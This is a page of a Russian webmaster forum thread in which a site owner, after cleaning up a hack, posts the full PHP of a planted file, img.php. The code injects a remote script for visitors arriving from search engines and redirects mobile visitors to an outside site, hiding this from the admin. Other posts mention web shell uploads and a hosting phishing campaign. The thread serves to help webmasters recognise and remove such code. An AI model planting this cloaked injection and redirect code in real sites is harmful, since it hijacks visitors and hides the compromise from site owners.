Кажется взломали – помогите проверить

(Ответов: 18, Просмотров: 2418)
Страница 2 из 2 Первая 12
  1. Гуру Аватар для ipreallyfire
    • Регистрация: 26.06.2012
    • Сообщений: 688
    • Репутация: 245
    • Webmoney BL: ?
    Тоже посмотрел, всё в порядке, не вылазит ВК месенджер. Даже не поленился с мобилы глянул, а то когда мне сайт ломанули, самое весёлое при заходе с мобильного начиналось, но нет, всё в порядке.

    По своему опыту, скажу что ломанули скорее всего через дырку в цмс. Ну а что с этим делать, простите не знаю
    • 2

    Спасибо сказали:

    genjnat(28.01.2013), OKyJIucT(28.01.2013),
  2. Sunshine reggae Аватар для OKyJIucT
    • Регистрация: 02.09.2011
    • Сообщений: 3,240
    • Репутация: 1830
    • Webmoney BL: ?
    Цитата Сообщение от ipreallyfire Посмотреть сообщение
    Даже не поленился с мобилы глянул,
    аналогично, с мобилы сразу зашел - сайт загружается нормально)
    • 2

    Спасибо сказали:

    genjnat(28.01.2013), ipreallyfire(28.01.2013),
  3. Опытный Аватар для Vladimir-AWM
    • Регистрация: 07.02.2010
    • Сообщений: 345
    • Репутация: 160
    • Webmoney BL: ?
    Ситуация с появлением кода может повториться. Тут надо искать каким образом злоумышленник получил доступ, подобрал пароль от админки сайта, FTP, хостинг панели или залил шелл через какую-нибудь дыру в PHP файлах.
    • 1

    Спасибо сказали:

    genjnat(28.01.2013),
  4. Гуру Аватар для genjnat
    • Регистрация: 29.11.2010
    • Сообщений: 2,884
    • Репутация: 2594
    • Webmoney BL: ?
    Уже все нашли и вычистили)
    Спасибо всем за помощь
    Сам файл, был залит в корень шаблона, назывался img.php
    как именно, установить не получается
    Содержимое файла, если кому интересно, вот

    Развернуть текст


    <?php
    session_start();

    if ( preg_match('/(google|yandex)/i', $_SERVER['HTTP_REFERER']) ) {
    $_SESSION['from_google_or_yandex'] = true;
    }

    if ( isset($_SESSION['from_google_or_yandex'] ) ) {
    echo "<script type='text/javascript' src='http://restorator.name/test.php'></script>";
    }

    setcookie('__utmr','cut_',mktime(0,0,0,1,1,2020));
    if (!isset($_COOKIE['__utmr'])) {
    if(preg_match('/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iem obile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link )|vodafone|wap|windows (ce|phone)|xda|xiino/i',$_SERVER['HTTP_USER_AGENT'])||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar (ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|b umb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a |jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|d o|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran |owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(4 0|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98 )|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($_SERVER['HTTP_USER_AGENT'],0,4))){
    header('Location: http://wap-opera.com/in.cgi?a');
    die();
    }
    }
    ?>
    [свернуть]
    Последний раз редактировалось genjnat; 28.01.2013 в 15:32.
    • 0
  5. Опытный Аватар для Vladimir-AWM
    • Регистрация: 07.02.2010
    • Сообщений: 345
    • Репутация: 160
    • Webmoney BL: ?
    Умело сделали :). Спрятали можно сказать от админа код всплывающего окна.

    После этого появилось желание все свои сайты проверить переходя на них с ПС.
    • 0
  6. Опытный Аватар для kanzas
    • Регистрация: 30.04.2011
    • Сообщений: 453
    • Репутация: 156
    Сегодня от имени хостинга Джино проспамили по мейлам якобы о изменениях паролей к аккаунту с просьбой подтвердить или отменить изменения. Ссылка в письме вела на фейковый сайт сделанный под Джино. Спалил, что фейк только потому что пользуюсь Ластпассом, написал в сапорт Джино они подтвердили, что такое безобразие носило массовый характер, на всякий случай поменял все пароли и временно запретил доступ по ftp. Кто хостится на Джино проверьте свои аккаунты на всякий случай.
    • 0
  7. Banned
    • Регистрация: 12.01.2013
    • Сообщений: 688
    • Репутация: 5
    • Webmoney BL: ?
    Ничего не выползает. Доступа к ftp ни у кого нет!? А то у меня тоже бывал такой случай, как парниша поставил рекламу на сайте у меня, но видимость поставил всем кроме администратора. Я её не видел не видел, а потом вышел ничяянно и опа на, реклама. И один раз было что сами хостеры рекламу на сайт воткнули, хотя там хостинг был УГ.
    • 0
  8. Опытный Аватар для trix88
    • Регистрация: 20.08.2012
    • Сообщений: 268
    • Репутация: 24
    пару месяце назад, на beget.ru была подобная шляпа.
    можно было залить шелл на свой сайт, и редактировать с этого шелла чужие сайты, у которых права на папки криво поставлены.
    • 0
  9. Гуру Аватар для worldfoto
    • Регистрация: 10.01.2013
    • Сообщений: 651
    • Репутация: 75
    • Webmoney BL: ?
    Все отлично работает ничего не выскакивает.. значит все вычестили
    • 0
Страница 2 из 2 Первая 12

Похожие темы

Темы Раздел Ответов Последний пост
Помогите, взломали сайт
Консультации по безопасности 16 28.01.2013 10:53
Как вам кажется? Это рерайт?
Вопросы от новичков 17 02.01.2013 14:29
В Я.Каталог попасть не так сложно как кажется?
Вопросы от новичков 10 22.09.2012 19:25
взломали ftp
Прочее 4 02.06.2012 14:18
Продавцы ftp для доров - не кажется ли вам, что они окуели?
Дорвеи и black SEO 55 14.09.2009 20:29

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры